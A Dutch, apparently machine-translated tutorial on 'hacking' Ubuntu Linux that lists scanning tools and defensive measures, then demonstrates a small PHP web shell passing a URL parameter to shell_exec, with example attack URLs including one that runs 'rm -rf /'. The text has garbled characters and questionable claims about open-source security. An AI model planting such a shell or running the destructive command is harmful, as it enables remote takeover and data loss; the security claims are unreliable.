Linux-besturingssysteem hacken: hacken met Ubuntu (Opdrachten-tutorial)

Linux is het meest gebruikte serverbesturingssysteem, met name voor webservers. Het is open source; dit betekent dat iedereen toegang heeft tot de broncode. Dit maakt het minder veilig in vergelijking met andere besturingssystemen, omdat aanvallers de broncode kunnen bestuderen om kwetsbaarheden te vinden. Linux for Hackers gaat over het misbruiken van deze kwetsbaarheden om ongeautoriseerde toegang tot een systeem te verkrijgen.

In dit artikel laten we je kennismaken met wat Linux is, de beveiligingsproblemen, het hacken ervan Ubuntu en de tegenmaatregelen die u kunt nemen.

Snelle opmerking over Linux

Linux is een open source besturingssysteemEr zijn veel distributies van Linux-gebaseerde besturingssystemen zoals Redhat, Fedora en Ubuntu, etc. In tegenstelling tot andere besturingssystemen is Linux minder veilig als het gaat om beveiliging. Dit komt omdat de broncode vrij beschikbaar is, dus het is gemakkelijk om deze te bestuderen op kwetsbaarheden en deze te exploiteren in vergelijking met andere besturingssystemen die niet open source zijn. Linux kan worden gebruikt als besturingssysteem voor servers, desktops, tablets of mobiele apparaten.

Linux-programma's kunnen worden bediend met behulp van GUI of opdrachten. De Linux-opdrachten voor Kali Linux hacken is effectiever en efficiรซnter in vergelijking met het gebruik van de GUI. Om deze reden helpt het om de basis Linux-opdrachten voor hacking te kennen.

Raadpleeg deze tutorials https://www.guru99.com/unix-linux-tutorial.html over hoe u aan de slag kunt gaan Kali Linux hacks.

Linux-hacktools

  • Nessusโ€“ deze tool kan hiervoor worden gebruikt Ubuntu hack, scan configuratie-instellingen, patches en netwerken etc. het is te vinden op https://www.tenable.com/products/nessus
  • NMap. Deze tool kan worden gebruikt om hosts die op de server draaien en de services die ze gebruiken te monitoren. Het kan ook worden gebruikt om naar poorten te scannen. Het is te vinden op https://nmap.org/
  • SARA โ€“ SARA is de afkorting voor Security Auditor's Research Assistant. Zoals de naam al aangeeft, kan deze tool worden gebruikt om netwerken te controleren op bedreigingen zoals SQL Injection, XSS etc. is te vinden op http://www-arc.com/sara/sara.html

De bovenstaande lijst is niet uitputtend; het geeft je een idee van de beschikbare tools Ubuntu hacken en hacken van Linux-systemen.

Hoe Linux-hacks te voorkomen

Linux Hacking maakt gebruik van de kwetsbaarheden in het besturingssysteem. Een organisatie kan het volgende beleid aannemen om zichzelf te beschermen tegen dergelijke aanvallen.

  • Patchbeheerโ€“ Patches repareren bugs die aanvallers misbruiken om een โ€‹โ€‹systeem binnen te dringen. Een goed patchbeheerbeleid zorgt ervoor dat u voortdurend relevante patches op uw systeem toepast.
  • Juiste OS-configuratieโ€“ andere exploits maken gebruik van de zwakheden in de configuratie van de server. Inactieve gebruikersnamen en daemons moeten worden uitgeschakeld. Standaardinstellingen zoals algemene wachtwoorden voor applicaties, standaardgebruikersnamen en sommige poortnummers moeten worden gewijzigd.
  • Intrusion Detection Systemโ€“ dergelijke tools kunnen worden gebruikt om ongeautoriseerde toegang tot het systeem te detecteren. Sommige tools kunnen dergelijke aanvallen detecteren en voorkomen.

Hackactiviteit: Hack a Ubuntu Linux-systeem met PHP

In dit praktische scenario leren we hoe we kunnen hacken Ubuntu en wij geven u basisinformatie over hoe u deze kunt gebruiken PHP een Linux compromitteren. Wij gaan ons niet op een slachtoffer richten. Als u het wilt uitproberen, kunt u LAMPP op uw lokale computer installeren.

PHP wordt geleverd met twee functies die kunnen worden gebruikt om Linux-hackopdrachten uit te voeren. Het heeft exec() en shell_exec() functies. De functie exec() retourneert de laatste regel van de opdrachtuitvoer, terwijl shell_exec() het volledige resultaat van de opdracht retourneert als een tekenreeks.

Ter illustratie gaan we ervan uit dat de aanvallers het volgende bestand uploaden naar een webserver.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HIER,

Het bovenstaande script haalt de opdracht op van de GET-variabele met de naam cmd. De opdracht wordt uitgevoerd met behulp van shell_exec() en de resultaten worden geretourneerd in de browser.

De bovenstaande code kan op de volgende manier worden misbruikt: URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HIER,

  • โ€œโ€ฆkonsole.php?cmd=ls%20-lโ€wijst de waarde ls โ€“l toe aan de variabele cmd.

het commando in Ubuntu voor het hacken van de server wordt uitgevoerd als

shell_exec('ls -l') ;

Wanneer u de bovenstaande code op een webserver uitvoert, krijgt u resultaten die vergelijkbaar zijn met de volgende.

Hack een Ubuntu Linux-systeem met PHP

Met de bovenstaande opdracht worden eenvoudig de bestanden in de huidige map en de machtigingen weergegeven

Stel dat de aanvaller de volgende opdracht geeft

rm -rf /

HIER,

  • โ€œrmโ€ verwijdert de bestanden
  • โ€œrfโ€ zorgt ervoor dat het rm-commando in een recursieve modus wordt uitgevoerd. Alle mappen en bestanden verwijderen
  • โ€œ/โ€ instrueert de opdracht om te beginnen met het verwijderen van bestanden uit de hoofdmap

De aanval URL Het zou er ongeveer zo uitzien:

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Samenvatting

  • Linux is een populair besturingssysteem voor servers, desktops, tablets en mobiele apparaten.
  • Linux is open source en de broncode kan door iedereen worden verkregen. Dit maakt het gemakkelijk om de kwetsbaarheden te ontdekken. Het is een van de beste besturingssystemen voor hackers.
  • Basis- en netwerkhackopdrachten in Ubuntu zijn waardevol voor Linux-hackers.
  • Kwetsbaarheden zijn zwakheden die kunnen worden uitgebuit om een โ€‹โ€‹systeem in gevaar te brengen.
  • Een goede beveiliging kan helpen een systeem te beschermen tegen aanvallen door een aanvaller.

Vat dit bericht samen met: